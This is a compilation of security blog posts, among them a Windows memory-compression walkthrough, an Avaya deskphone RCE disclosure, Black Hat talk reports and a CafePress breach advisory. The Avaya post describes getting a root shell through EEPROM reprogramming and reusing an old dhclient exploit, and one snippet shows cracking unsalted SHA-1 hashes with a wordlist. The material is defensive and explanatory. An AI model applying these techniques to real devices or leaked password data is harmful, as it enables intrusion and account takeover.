Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete, we find that our chunk key is 0x4b02d. Since it’s a compound value, we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, as well as the offset within the located chunk. The decoding involves four additional SMHP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.


Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.


Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.


Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.

Conclusion

In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1703 x64. The same techniques can be applied to Windows 10 1607 onwards, assuming the correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.


Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware

Avaya is the second largest VOIP solution provider (source) with an install base covering 90% of the Fortune 100 companies (source), with products targeting a wide spectrum of customers, from small business and midmarket, to large corporations. As part of the ongoing McAfee Advanced Threat Research effort into researching critical vulnerabilities in widely deployed software and hardware, we decided to have a look at the Avaya 9600 series IP Deskphone. We were able to find the presence of a Remote Code Execution (RCE) vulnerability in a piece of open source software that Avaya likely copied and modified 10 years ago, and then failed to apply subsequent security patches to. The bug affecting the open source software was reported in 2009, yet its presence in the phone’s firmware remained unnoticed until now. Only the H.323 software stack is affected (as opposed to the SIP stack that can also be used with these phones), and the Avaya Security Advisory (ASA) can be found here ASA-2019-128.

The video below demonstrates how an attacker can leverage this bug to take over the normal operation of the phone, exfiltrate audio from its speaker phone, and potentially “bug” the phone. The current attack is conducted with the phone directly connected to an attacker’s laptop but would also work via a connection to the same network as a vulnerable phone. The full technical details can be found here, while the rest of this article gives a high-level overview of how this bug was found and some considerations regarding its resolution. The firmware image Avaya published on June 25th resolves the issue and can be found here. As a user, you can verify whether your Deskphone is vulnerable: first determine if you have one of the affected models (9600 Series, J100 Series or B189), then find which firmware version your phone is using in the “About Avaya IP Deskphone” screen under the Home menu; version 6.8.1 and earlier are vulnerable when running an H.323 firmware (SIP versions are not affected).

What are Researchers Looking for?

When studying the security of embedded and IoT devices, researchers generally have a couple of goals in mind to help kickstart their research. In most cases, two of the main targets are recovering the files on the system so as to study how the device functions, and then finding a way to interact directly with the system in a privileged fashion (beyond what a normal user should be able to do). The two can be intertwined, for instance getting a privileged access to the system can enable a researcher to recover the files stored on it, while recovering the files first can show how to enable a privileged access.

In this case, recovering the files was straightforward, but gaining a privileged access required a little more patience.

Recovering the Files From the Phone

When we say recovering the files from the phone, we mean looking for the operating system and the various pieces of software running on it. User files, e.g. contacts, settings and call logs, are usually not of interest to a security researcher and will not be covered here. To recover the files, the easiest approach is to look for firmware updates for the device. If we are lucky, they will be freely available and not encrypted. In most cases, an encrypted firmware does not increase the security of the system but rather raises the barrier of entry for security researchers and attackers alike. Here we are in luck: Avaya’s website serves firmware updates for its various phone product lines, and anyone can download them. The download contains multiple tar files (a type of archive file format). We can then run a tool called binwalk on the extracted files. Binwalk is built around a large dictionary of patterns representing known file formats; given an unknown firmware file, it will look for any known pattern and, upon finding potential matches, will attempt to process them accordingly. For instance, if it finds what looks like a .zip file inside the firmware, it will try to unzip it. Running this tool is always a good first step when facing an unknown firmware file as, in most cases, it will identify useful items for you.
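A toy version of what binwalk does at heart can be sketched in a few lines: slide over the image looking for known magic bytes. The signatures below are real file magics but a tiny fraction of binwalk's dictionary, and a real tool would go on to carve and parse each hit rather than just report it.

```python
# A handful of real magic-byte signatures (binwalk knows thousands).
SIGNATURES = {
    b"\x1f\x8b\x08": "gzip",
    b"PK\x03\x04": "zip",
    b"hsqs": "squashfs (little-endian)",
    b"\x85\x19": "jffs2 (little-endian magic)",
}

def scan(image: bytes):
    """Yield (offset, format name) for every signature hit in the image."""
    for magic, name in SIGNATURES.items():
        start = 0
        while (hit := image.find(magic, start)) != -1:
            yield hit, name
            start = hit + 1
```

Short magics like the two-byte JFFS2 one will produce false positives on real images, which is why binwalk backs its patterns with format-aware validation.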

When processing the phone’s firmware, extracting the files and running binwalk on them gave us the program the phone runs at startup (the bootloader), the Linux kernel used by the phone, and a JFFS filesystem that contains all the phone’s binaries and configuration files. This is a great start, as from there we can begin understanding the inner workings of the device and look for bugs. At this stage, however, we are limited to static analysis: we can look at the files and peek at the assembly instructions of various binaries, but we cannot execute them. To make life easier, there are usually two options. The first is to emulate the whole phone, or at least some region of interest, while the other is to get privileged access to the system, to inspect what is running on it and run debugging tools. Best results come when you mix and match these options appropriately. For the sake of simplicity, we will only cover the latter, but both were used in various ways to help us in our research.

Getting the Privileged Access

In most cases, when talking about gaining privileged access to an IoT/embedded device, security researchers are on the lookout for an administrative interface called a root shell that lets them execute any code they want with the highest level of privilege. Sometimes, one is readily available for maintenance purposes; other times more effort is required to gain access to it, assuming one is present in the first place. This is when hardware hacking comes into play; security researchers love to rip open devices and void warranties, looking for potential debug ports, gatekeepers of the sought-after privileged access.

Close-up of the phone’s circuit board: UART ports in red and the EEPROM in blue

In the picture above, we can see two debug ports labeled UART0 and UART1. This type of test point, where the copper is directly exposed, is commonly used during the manufacturing process to program the device or verify everything is working properly. UART stands for Universal Asynchronous Receiver-Transmitter and is meant for two-way communication. This is the most likely place where we can find the administrative access we are looking for. By buying a $15 cable that converts UART to USB and soldering wires onto the test pads, we can see debug information being printed on screen when the phone boots up, but soon the flow of debug information dries up. This is a curious behavior—why stop the debug messages?—so we need to investigate more. By using a disassembler to convert raw bytes into computer instructions, we can peek into the code of the bootloader recovered earlier and find out that during the boot process the phone fetches settings from external memory to decide whether the full set of debug features should be enabled on the serial console. The external memory is called an EEPROM and is easily identifiable on the board, first by its shape and then by the label printed on it. Labels on electronic components are used to identify them and to retrieve their associated datasheet, the technical documentation describing how to use the chip from an electrical engineering standpoint. Soldering wires directly to the chip under a microscope, and connecting it to a programmer (a $30 gizmo called a buspirate), allows us to change the configuration stored on it and enable the debug capabilities of the phone.

EEPROM ready to be re-programmed

Rebooting the phone gives us much more debug information and, eventually, we are greeted with the root shell we were after.

Confirmation we have a root shell. Unrelated debug messages are being printed while we are invoking the “whoami” command

Alternative Roads

The approach described above is fairly lengthy and is only interesting to security researchers in a similar situation. A more generic technique would be to directly modify the filesystem by altering the flash storage (a NAND Flash on the back of the circuit board) as we did for previous research, and then automatically start an SSH server or a remote shell. Another common technique is to tamper with the NAND flash while the filesystem is loading in memory, to get the bootloader in an exception state that will then allow the researcher to modify the boot arguments of the Linux kernel. Otherwise, to get remote shell access, using an older firmware with known RCE vulnerabilities is probably the easiest method to consider; it can be a good starting point for security researchers and is not threatening to regular users as they should already have the most up-to-date software. All things considered, these methods are not a risk to end-users and are more of a stepping stone for security researchers to conduct their research.

In Search of Vulnerabilities

After gaining access to a root shell and the ability to reverse engineer the files on the phone, we are faced with the open-ended task of looking for potentially vulnerable software. As the phone runs Linux, the usual command-line utilities people use for administering Linux systems are readily available to us. It is natural to look at the list of running processes, find the ones with network connections, and so forth. While poking around, it becomes clear that one of the utilities, dhclient, is of great interest. It is already running on the system and handles network configuration (the so-called DHCP requests to configure the phone’s IP address). If we invoke it on the command line, the following is printed:

Showing a detailed help screen describing its expected arguments is normal behavior, but a 2004-2007 copyright is a big red flag. A quick search confirms that the 4.0.0 version is more than 10 years old and, even worse, an exploit targeting it is publicly available. The dhclient code is open source, so finding the differences between two successive versions is straightforward. Studying the exploit code and how the bug was patched helps us narrow down which part of the code could be vulnerable. By once again using a disassembler, we confirm the phone’s version of dhclient is indeed vulnerable to the bug reported in 2009. Converting the original exploit to make it work on the phone requires a day or two of work, while building the proof of concept demonstrated in the above video is a matter of mere hours. Indeed, all the tools to stream audio from the phone to a separate machine are already present on the system, which greatly reduces the effort to create this demo. We did not push the exploitation further than the proof of concept shown in the above video, but we can assume that, at this point, building a weaponized version able to threaten private networks is more of a software engineering task, and a skilled attacker might only need a few weeks, if not days, to put one together.
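A first, rough triage step like the one above can be automated by comparing a binary’s reported version against the first patched release. The sketch below is illustrative only: the cutoff version is an assumption standing in for the actual 2009 advisory, not an authoritative vulnerability test.

```python
# Sketch: flag a dhclient build as potentially vulnerable by comparing
# version tuples. The "patched" cutoff here is illustrative; a real
# check must consult the vendor advisory, since backported fixes can
# make version strings misleading.

def parse_version(v: str) -> tuple:
    """'4.0.0' -> (4, 0, 0); suffixes like '-P1' are dropped for simplicity."""
    core = v.split("-")[0]
    return tuple(int(part) for part in core.split("."))

def predates(installed: str, patched: str) -> bool:
    """True if the installed version is older than the patched release."""
    return parse_version(installed) < parse_version(patched)

# The phone shipped dhclient 4.0.0, which predates the 2009-era fix
# (cutoff shown here for illustration).
assert predates("4.0.0", "4.1.0")
assert not predates("4.1.1-P1", "4.1.0")
```

Tuple comparison works here because Python compares tuples element by element, matching how dotted version numbers are ordered.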

Remediation

Upon finding the flaw, we immediately notified Avaya with detailed instructions on how to reproduce the bug and suggested fixes. They were able to fix, test and release a patched firmware image in approximately two months. At the time of publication, the fix will have been out for more than 30 days, leaving IT administrators ample time to deploy the new image. In a large enterprise setting, it is pretty common to first have a testing phase where a new image is deployed to selected devices to ensure no conflict arises from the deployment. This explains why the timeline from patch release to deployment across the whole fleet may take longer than what is typical for consumer-grade software.

Conclusion

IoT and embedded devices tend to blend into our environment, in some cases not warranting a second thought about the security and privacy risks they pose. In this case, with a minimal hardware investment and free software, we were able to uncover a critical bug that remained out-of-sight for more than a decade. Avaya was prompt to fix the problem and the threat this bug poses is now mitigated, but it is important to realize this is not an isolated case and many devices across multiple industries still run legacy code more than a decade old. From a system administration perspective, it is important to consider all these networked devices as tiny black-box computers running unmanaged code which should be isolated and monitored accordingly. The McAfee Network Security Platform (NSP) detects this attack as “DHCP: Subnet Mask Option Length Overflow” (signature ID: 0x42601100), ensuring our customers remain protected. Finally, for the technology enthusiasts reading this, the barrier to entry for hardware hacking has never been this low, with plenty of online resources and cheap hardware to get started. Looking for this type of vulnerability is a great entry point to information security and will help make the embedded world a safer place.

The post Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware appeared first on McAfee Blogs.

Live From Black Hat USA: The Inevitable Marriage of DevOps & Security

During her briefing with Kelly Shortridge, vice president of product strategy at Capsule8, Dr. Nicole Forsgren, who leads research and strategy at Google, did a beautiful job of adding imagery to the story she told of the attendee reactions during the now-famous talk Paul Hammond and John Allspaw gave at Velocity in 2009. If you're not familiar, the title of said talk was, "10 Deploys Per Day: Dev & Ops Cooperation at Flickr."

Forsgren recalled that, "The room was split. At the end of this process, large pieces of code would be deployed and, basically, lit everyone on fire. Half the room was amazed and it was changing the world. Half of the room said they were monsters and how dare they light people on fire 10 times per day." Forsgren concluded that "DevOps has crossed the chasm - the business benefits are too striking. We see most of the industry doing this. There is no turning the ship around."

Indeed, DevOps has long moved beyond the conceptual and has become a widely adopted practice in software development and delivery. It gave birth to the InfoSec equivalent of DevSecOps and the concept of "shifting security left." From where I sit within Veracode, I see the ways that many security solutions providers are doing their best to provide developers with the tools they need to embed security into their workflow, yet it’s clear that there is still more to be done to get InfoSec professionals on board.

"James Wickett has said the ratio of engineers in development, operations, and InfoSec in a typical technology organization is 100:10:1. If we integrate [InfoSec professionals] earlier to have input, the shift left can build a more collaborative culture, contribute to amazing outcomes - like stability, reliability, and resiliency," Forsgren said. "We need to build secure systems, and we will find ways to do this. We know this is super important, and security is the next frontier. Security can contribute to this and join DevOps. Or you can stand aside as DevOps figures this out and carves its own path. I would love to see InfoSec contributing the expertise we just don't have."

Forsgren was clearly echoing the sentiment Dino Dai Zovi expressed in his conference keynote. Certainly, the concept of being lit on fire 10 times per day would create a fight-or-flight response, and it is much easier to go to no than to go to yes. Yet, when Forsgren spoke about the benefits of this type of work, she explained that what InfoSec pros would face would be mini-fires with a smaller blast radius. She argues that it is time for InfoSec to say, "no, and…"

The Security of Chaos

It appeared that Shortridge couldn't have agreed more.

"The real DevOps will be held accountable for security fixes," said Shortridge. "So what should goals and outcomes become? Why should InfoSec and DevOps goals diverge? InfoSec should support innovation in the face of change - not add friction. InfoSec has arguably failed, so 'this is how we've always done it' is invalid. The greatest advances in security are rarely spawned by the security industry."

In other words, it's time to start jumping out of the proverbial planes in order to face our fears and start doing things differently in security. Shortridge reminded us that it is inevitable that things will fail and things will be pwned, which is why she is a proponent of adopting chaos engineering. Chaos engineering is the discipline of experimenting on a software system in production to provide your organization with a level of confidence in the system's capability to withstand turbulent and unexpected conditions, while still creating adequate quality of service (resiliency) during difficult times.

The concept of chaos engineering was created while Greg Orzell was overseeing Netflix's migration to the cloud in 2011. He wanted to address the lack of adequate resilience by creating a tool that would cause breakdowns in their production environment - the one used by Netflix customers. In doing this, the team could move from a development model that assumed no breakdowns to one where they were considered inevitable. This encouraged developers to build resilience into their software from the start. By regularly "killing" random instances of software service, they could test redundant architecture to make sure that a server failure wouldn't noticeably impact the customer experience.
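The "kill random instances, verify the customer never notices" idea described above can be reduced to a toy simulation. The sketch below is a minimal illustration in the spirit of that approach, not the Netflix tool itself; instance names and the redundancy threshold are made up.

```python
# Sketch: a toy chaos experiment. Randomly terminate one instance of a
# redundant service, then verify enough replicas survive to keep
# serving traffic. All names and thresholds are illustrative.

import random

def kill_random_instance(instances: list, rng: random.Random) -> list:
    """Simulate terminating one running instance chosen at random."""
    survivors = list(instances)
    survivors.pop(rng.randrange(len(survivors)))
    return survivors

def can_serve_traffic(instances: list, min_replicas: int = 2) -> bool:
    """The service stays healthy as long as a quorum of replicas remains."""
    return len(instances) >= min_replicas

fleet = ["web-1", "web-2", "web-3"]
rng = random.Random(0)                   # seeded so the experiment is repeatable
after_failure = kill_random_instance(fleet, rng)
assert len(after_failure) == 2
assert can_serve_traffic(after_failure)  # redundancy absorbs the failure
```

The point of running such experiments continuously, as the article argues, is that the assertion at the end is checked against reality before a real outage checks it for you.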

"Expect your security controls will fail and prepare accordingly. System architectures must be designed assuming the controls and users will fail," she said. "Users very rarely follow the ideal behaviors. Don’t try to avoid incidents. Embrace your ability to respond to them. Ensure that your systems are resilient enough to handle incidents gracefully. Pivot toward realistic resilience."

Even if your team can plan for nothing but the chaos factor, understand that there are true benefits to applying chaos resilience, including lower remediation costs, decreased stress levels during real incidents, and less burnout.

"Incidents are a problem with known processes, rather than fear and uncertainty. It creates feedback loops to foster understanding of systemic risk. Chaos engineering does this to help us continuously refine security strategy - essentially all the time red teaming. You have the ability to automate the toil, or the manual, repetitive, tactical work that doesn't provide enduring value," she said.

How to Marry DevOps and Security

At the end of the talk, Forsgren offered these tenets for a scalable love between DevOps and Security:

  1. Sit in on early design decisions and demos – but say “No, and…” vs. “No.”
  2. Provide input on tests so every testing suite has InfoSec’s stamp on it.
  3. By the last “no” gate in the delivery process, nearly all issues will be fixed.
  4. InfoSec should focus on outcomes that are aligned with business goals.
  5. Time To Remediate (TTR) should become the preliminary anchor of your security metrics.
  6. Security- and performance-related gamedays can’t be separate species.
  7. Cultivate buy-in together for resilience and chaos engineering.
  8. Visibility/observability: collecting system information is essential.
  9. Your DevOps colleagues are likely already collecting the data you need - work with them to collect it.
  10. Changing culture: change what people do, not what they think.

Forsgren and Shortridge made the case that security cannot force itself into DevOps, it must marry it - and have an equal partnership. Chaos/resilience are natural homes for InfoSec and represent its future, and InfoSec will need to evolve to unify responsibility and accountability.

"If not, InfoSec will sit at the kids’ table until it is uninvited from the business," Shortridge said. "Giving up control isn’t a harbinger of doom. Resilience is a beacon of hope."

Stay tuned for more from Black Hat …

Understanding why phishing attacks are so effective and how to mitigate them

Elie Bursztein, Security & Anti-abuse Research Lead, Daniela Oliveira, Professor at the University of Florida

Phishing attacks continue to be one of the most common forms of account compromise threats. Every day, Gmail blocks more than 100 million phishing emails and Google Safe Browsing helps protect more than 4 billion devices against dangerous sites.

As part of our ongoing efforts to further protect users from phishing, we’re partnering with Daniela Oliveira from the University of Florida on a talk at Black Hat 2019 exploring why social engineering attacks remain effective phishing tactics, even though they have been around for decades.

Overall, the research finds there are a few key factors that make phishing an effective attack vector:
  • Phishing is constantly evolving: 68% of the phishing emails blocked by Gmail today are new variations that were never seen before. This fast-paced adversarial evolution requires humans and machines to adapt very quickly to keep these attacks at bay.
  • Phishing is targeted: Many of the campaigns targeting Gmail end-users and enterprise consumers only target a few dozen individuals, with enterprise users being 4.8x more likely to be targeted than end-users.
  • Phishers are persuasion experts: As highlighted by Daniela’s research with Natalie Ebner et al. at the University of Florida, phishers have mastered the use of persuasion techniques, emotional salience, and gain or loss framing to trick users into reacting to phishing emails.
  • 45% of users don’t understand what phishing is: After surveying Internet users, we found that 45% of them do not understand what phishing is or the risk associated with it. This lack of awareness increases the risk of being phished and potentially hinders the adoption of 2-step verification.

Protecting users against phishing requires a layered defense approach that includes:
  • Educating users about phishing so they understand what it is, how to detect it and how to protect themselves.
  • Leveraging the recent advances in AI to build robust phishing detection that can keep pace with fast-evolving phishing campaigns.
  • Displaying actionable phishing warnings that are easy to understand by users so they know how to react when they see them.
  • Using strong two-factor authentication to make it more difficult for phishers to compromise accounts. Two-factor technologies, as visible in the graph above, can be effective against the various forms of phishing, which highlights the importance of driving awareness and adoption among users.
While technologies to help mitigate phishing exist, such as FIDO-standard security keys, there is still work to be done to help users increase awareness and understand how to protect themselves against phishing.
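To make the second-factor idea concrete, here is a minimal sketch of a TOTP (RFC 6238) generator, the kind of time-based one-time code many 2-step verification apps produce, using only the standard library. It is for illustration only; real deployments should rely on vetted libraries or, better, phishing-resistant security keys.

```python
# Sketch: minimal TOTP (RFC 6238) using HMAC-SHA1 and dynamic
# truncation. Illustrative only -- use a vetted library in production.

import hmac, hashlib, struct

def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    counter = unix_time // step                       # 30-second time window
    msg = struct.pack(">Q", counter)                  # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890" at T=59s
assert totp(b"12345678901234567890", 59) == "287082"
```

Because the code is derived from a shared secret and the current time window, a stolen password alone is not enough to log in, which is exactly the property that makes phishing harder (though codes can still be relayed in real time, which is why security keys go further).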

23M CafePress Accounts Compromised: Here’s How You Can Stay Secure

You’ve probably heard of CafePress, a custom T-shirt and merchandise company allowing users to create their own unique apparel and gifts. With a plethora of users looking to make their own creative swag, it’s no surprise that the company was recently targeted in a cybercriminal ploy. According to Forbes, CafePress experienced a data breach back in February that exposed over 23 million records including unique email addresses, names, physical addresses, phone numbers, and passwords.

How exactly did this breach occur? While this information is still a bit unclear, security researcher Jim Scott stated that approximately half of the breached passwords had been stored as base64-encoded SHA-1 hashes, a weak, outdated hashing scheme (not true encryption) that is relatively easy to crack. As a result, the breach database service HaveIBeenPwned sent out an email notification to those affected letting them know that their information had been compromised. According to Engadget, about 77% of the email addresses in the breach have shown up in previous breach alerts on HaveIBeenPwned.
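Per the reporting above, part of the password set was protected only with base64-encoded SHA-1. The sketch below illustrates why that scheme falls quickly to an offline dictionary attack: without a salt, identical passwords always hash to identical values, so an attacker can precompute hashes for common passwords and match them against the leak. The passwords and wordlist here are made up.

```python
# Sketch: why unsalted, base64-encoded SHA-1 password storage is weak.
# Identical inputs always produce identical hashes, enabling offline
# dictionary attacks against a leaked database.

import base64, hashlib

def weak_hash(password: str) -> str:
    """Unsalted SHA-1, base64-encoded -- do NOT use for real passwords."""
    return base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()

leaked = weak_hash("password123")           # a hash as it might appear in the dump
wordlist = ["letmein", "password123", "qwerty"]

# Dictionary attack: hash each candidate and compare against the leak.
cracked = next((w for w in wordlist if weak_hash(w) == leaked), None)
assert cracked == "password123"
```

Modern password storage defeats this by using a slow, salted algorithm (bcrypt, scrypt, or Argon2), so that each hash must be attacked individually and each guess is expensive.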

Scott stated that those who used CafePress through third-party applications like Facebook or Amazon did not have their passwords compromised. And even though third-party platform users are safe from this breach, this isn’t always the case. With data breaches becoming more common, it’s important for users to protect their information as best as they can. Check out the following tips to help users defend their data:

  • Check to see if you’ve been affected. If you know you’ve made purchases through CafePress recently, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 23M CafePress Accounts Compromised: Here’s How You Can Stay Secure appeared first on McAfee Blogs.

7 Steps to Building a Cybersecurity Strategy from Scratch

When your organization is young and growing, you may find yourself overwhelmed with a never-ending to-do list.  It can be easy to overlook security when you’re hiring new employees, finding infrastructure, and adopting policies.  Without a proper cybersecurity strategy, however, the business that you’ve put your heart and soul into, or the brilliant idea that you’ve spent years bringing to life, are on the line. Every year, businesses face significant financial, brand, and reputational damage resulting from a data breach, and many small businesses don’t ever recover.

Not only that, but as you grow you may be looking to gain investors or strategic partners.  Many of these firms are not willing to give organizations that don’t take security seriously a chance. A strong security stance can be your differentiator among your customers and within the Venture Capital landscape.

One thing’s for sure: you’ve spent a great deal of time creating a business of your own, so why throw it all away by neglecting your security?  You can begin building your own cybersecurity strategy by following these steps:

1.  Start by identifying your greatest business needs.

This understanding is critical when determining how your vulnerabilities could affect your organization.  Possible business needs could include manufacturing, developing software, or gaining new customers. Make a list of your most important business priorities.

2.  Conduct a third-party security assessment to identify and remediate the greatest vulnerabilities to your business needs.

 The assessment should evaluate your organization’s overall security posture, as well as the security of your partners and contractors.

Once you understand the greatest risks to your business needs, you can prioritize your efforts and budget based on ways to remediate these.

3.  Engage a Network Specialist to set up a secure network or review your existing network.

A properly designed and configured network can help prevent unwanted users from getting into your environment and is a bare necessity when protecting your sensitive data.

Don’t have a set office space?  If you and your team are working from home or communal office spaces, be sure to never conduct sensitive business on a shared network.

4.  Implement onboarding (and offboarding) policies to combat insider threat, including a third-party vendor risk management assessment.

 Your team is your first line of defense, but as you grow, managing the risk of bringing on more employees can be challenging.  Whether attempting to maliciously steal data or clicking a bad link unknowingly, employees pose great threats to organizations.

As part of your onboarding policy, be sure to conduct thorough background checks and monitor users’ access privileges.  This goes for your employees, as well as any third parties and contractors you bring on.

5.  Implement a security awareness training program and take steps to make security awareness part of your company culture.

Make sure your training program includes topics such as password best practices, phishing identification and secure travel training.  Keep in mind, though, that company-wide security awareness should be more than once-a-year training.  Instead, focus on fostering a culture of cybersecurity awareness.

6.  Set up multi-factor authentication and anti-phishing measures.

Technology should simplify your security initiatives, not complicate them.  Reduce the number of administrative notifications to only what is necessary and consider improvements that don’t necessarily require memorizing more passwords, such as password managers and multi-factor authentication for access to business-critical data.

7.  Monitor your data and endpoints continuously with a Managed Security Services Provider.

As you grow, so do the number of endpoints you have to manage and the amount of data you have to protect. One of the best ways to truly ensure this data is protected is to have analysts monitoring it at all hours. A managed security services provider will monitor your data through a 24/7 security operations center, keeping an eye out for any suspicious activity, such as phishing emails, malicious sites, and unusual network activity.

You’re not done yet: revisit your security strategy as you evolve.  

It’s important to remember that effective cybersecurity strategies vary among organizations. As you grow, you’ll want to consider performing regular penetration testing and implementing an Incident Response Plan.  

And, as your business changes, you must continually reassess your security strategy and threat landscape.

For more information, get the Comprehensive Guide to Building a Cybersecurity Strategy from Scratch.

The post 7 Steps to Building a Cybersecurity Strategy from Scratch appeared first on GRA Quantum.

Chinese cyberhackers ‘blurring line between state power and crime’

Cybersecurity firm FireEye says ‘aggressive’ APT41 group working for Beijing is also hacking video games to make money

A group of state-sponsored hackers in China ran activities for personal gain at the same time as undertaking spying operations for the Chinese government in 14 different countries, the cybersecurity firm FireEye has said.

In a report released on Thursday, the company said the hacking group APT41 was different to other China-based groups tracked by security firms in that it used non-public malware typically reserved for espionage to make money through attacks on video game companies.

Related: Australia joins condemnation of 'huge, audacious' Chinese hacking plot

Continue reading...

Live From Black Hat USA: Four Key Takeaways from Dino Dai Zovi’s Keynote

"Did you know that your 20th Black Hat is when you get to give the keynote at Black Hat?" Dino Dai Zovi, head of security for Cash App at Square, joked to the packed ballroom. While it may have been Dai Zovi's 20th conference, the topic of his keynote has never been more fitting for where we are in security and the ways in which it mirrors what we experience in our day-to-day life.

He gave us an overview of his history: in high school he realized that hacking and security was a lot more like magic than he previously thought, because it was about figuring out how things work, putting a lot of thought into writing and making something respond in the way you want it to. In college, he spent his nights, weekends, and spring breaks learning how to find and exploit vulnerabilities in code. And about that time (in 2007) he used his skills to simultaneously prove that Apple's OS X operating system could, indeed, be hacked and win a laptop for his friend in the Pwn2Own competition.  

No big deal.

Dai Zovi took his work as a security researcher into more corporate organizations, where he learned about the importance of automation, understanding what is really being asked for in order to solve the right problem, and ensuring that there is collaboration between security and development to achieve more quality outcomes. Here are the four key lessons that Dai Zovi learned as he transitioned from offense to defense.

Work backwards from the job: Dai Zovi talked about how McDonald's was working to understand how they should evolve their milkshake. What they noticed was that people were ordering them in the morning, and they wanted to see why this was happening. In discussions with a customer, the customer indicated that they needed to have breakfast on their morning commute. They had tried a banana, but it wasn't filling enough; a bagel was too dry, and spreading cream cheese while driving was too challenging; in giving doughnuts a shot, they found they were eating too many; but the McDonald's milkshake - unlike other milkshakes - was thick enough to last the full 40-minute drive to work and left them feeling full. As it turns out, the customer was not ordering a milkshake to satisfy hunger, but to cure boredom. Really try to understand your customer: who they are, where they struggle, and what you need to do to provide the best product or solution for them.

Seek and apply leverage: For this story, Dai Zovi took us back to his time with @stake, where, when he first started, he was essentially fuzzing by hand. He wanted to show off his skills, but he realized that his colleague was completing his work - and finding more vulnerabilities - faster than him (and subsequently honing his foosball game) by using an automated technique. So Dai Zovi followed his lead and found that he was able to find more and do it more effectively. By using feedback loops, software, and automation, you can really scale your impact.

Culture is more powerful than strategy which is more powerful than tactics: In one of the organizations he worked in, Dai Zovi was in a conversation with a developer who had been working on a feature but noticed it was coming out…a bit "sketchy." So the developer and security team white boarded out the feature and worked together to ensure that it was secure by design (shift left, anyone?). As security leaders, it's important that we focus on the security culture of our organizations. If we can create security culture change in every team, we can scale a lot more powerfully than we can if security is only security's responsibility.

Start with yes: We need to engage the world starting with yes. It keeps the conversation going, it keeps the conversation collaborative, and it keeps the conversation constructive. It says, "I want to work to solve the other problems you have, and I want to make you safe.” That's how we create real change and have a real impact.

"Why don't all security teams start with yes," Dai Zovi asked the audience. "Fear. There are lots of reasons to be afraid. But fear misguides us because it's irrational. Fear causes paralysis and creates more insecurity because it often leads to doing nothing."

For me, this was the most powerful takeaway. Dai Zovi talked about how he overcame his fear of flying by learning how to skydive. He felt the fear center in his brain activate and assured it that he would be fine: he had the right equipment and knowledge and knew that he would land safely. The more he jumped, the more he proved to his brain that he was safe and the fear dissipated.

Here is a truth about the human brain: we fear being rejected (or not belonging) and change above all else. There was a time when being outcast from the community meant certain death, and because change cannot be predicted, it cannot be planned for. As evolved as we have become, our brains have not kept up, and we are all walking around with outdated technology that thinks it should respond to change the same way it does to being chased by a lion.

Ultimately, if we want to strengthen communication we need to first understand that we're all human and assume good intent. Everyone wants to feel safe and they want to belong, and these two desires can stop progress in its tracks. Yet being agile and objective, communicative and collaborative, are essential in today's changing threat landscape. The reality is, we need more innovation and teamwork in development and security - not less. Change is both an inevitable part of life and keeping software safe - we must be agile in our thinking and in our actions.

Stay tuned for more from Black Hat …

Live From Black Hat USA: Communication’s Key Role in Security

The kick-off keynote for the 23rd Black Hat USA Conference in Las Vegas set the stage for the conversations that will undoubtedly be discussed in great detail over the next two days - and likely the next two years - if Black Hat founder Jeff Moss’ opening remarks are indicative of a trend. Moss pointed out that security had been asking for the spotlight, both in legislative and more corporate settings, and the industry has had it for the last two years. However, it isn't enough to have the spotlight if you don't know how to harness it. In this case, what Moss was talking about is that how we communicate determines the outcomes we receive. He quipped that if you communicate well, then you may find yourself with more budget - and if you communicate poorly, you could find yourself fired.

Point taken.

Yet defining what cyber or security is remains an ongoing challenge, and Moss notes that oftentimes the language that we use causes us to think of a problem in a certain way, taking us in a direction we don't really want to be heading. He notes that while cyber, or information, is considered the Fifth Domain, it doesn't mean that it is equal to land, sea, air, and space. It's different and requires a different language and level of thinking. You can't use the language and laws of the sea to govern the laws of the Internet or how we engage there, because it is vastly different in nature. It's also vastly different depending on where you're engaging, assuming the Internet isn't simply … everywhere.

Moss told a story about how he was speaking with a colleague who told him about how in China, the money is in DDoS protection because attackers are using the "Great Firewall of China" to blackmail other Chinese companies. They're not worried about identity theft because they don't really have it: Chinese farmers sell their identity for 3,000 yuan. Meaning that "all of the identities are legit, they're just not the person you think they are."

"You might think the Internet works one way, and in one conversation it can flip upside down," Moss told the audience.

